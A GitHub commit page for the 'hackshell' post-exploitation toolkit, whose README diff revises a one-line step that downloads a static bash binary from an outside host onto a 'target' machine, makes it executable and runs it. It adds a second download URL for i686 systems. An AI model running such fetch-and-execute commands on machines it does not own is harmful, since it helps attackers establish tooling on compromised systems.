Skip to content

Commit

Permalink
Merge branch 'main' of github.com:hackerschoice/hackshell
Browse files Browse the repository at this point in the history
  • Loading branch information
rootTHC committed Oct 10, 2024
2 parents 77677bc + 5537e53 commit 1eb42be
Showing 1 changed file with 3 additions and 1 deletion.
4 changes: 3 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -22,5 +22,7 @@ Some features:

It works best with bash. Download BASH if there is no bash on your target:
```shell
curl -obash -SsfL "https://bin.ajam.dev/$(uname -m)/bash" && chmod 700 bash && ./bash --version && exec ./bash -il
URL="https://bin.ajam.dev/$(uname -m)/bash"
[ "$(uname -m)" == i686 ] && URL='https://github.com/polaco1782/linux-static-binaries/raw/refs/heads/master/x86-i686/bash'
curl -obash -SsfL "${URL}" && chmod 700 bash && ./bash --version && exec ./bash -il
```

0 comments on commit 1eb42be

Please sign in to comment.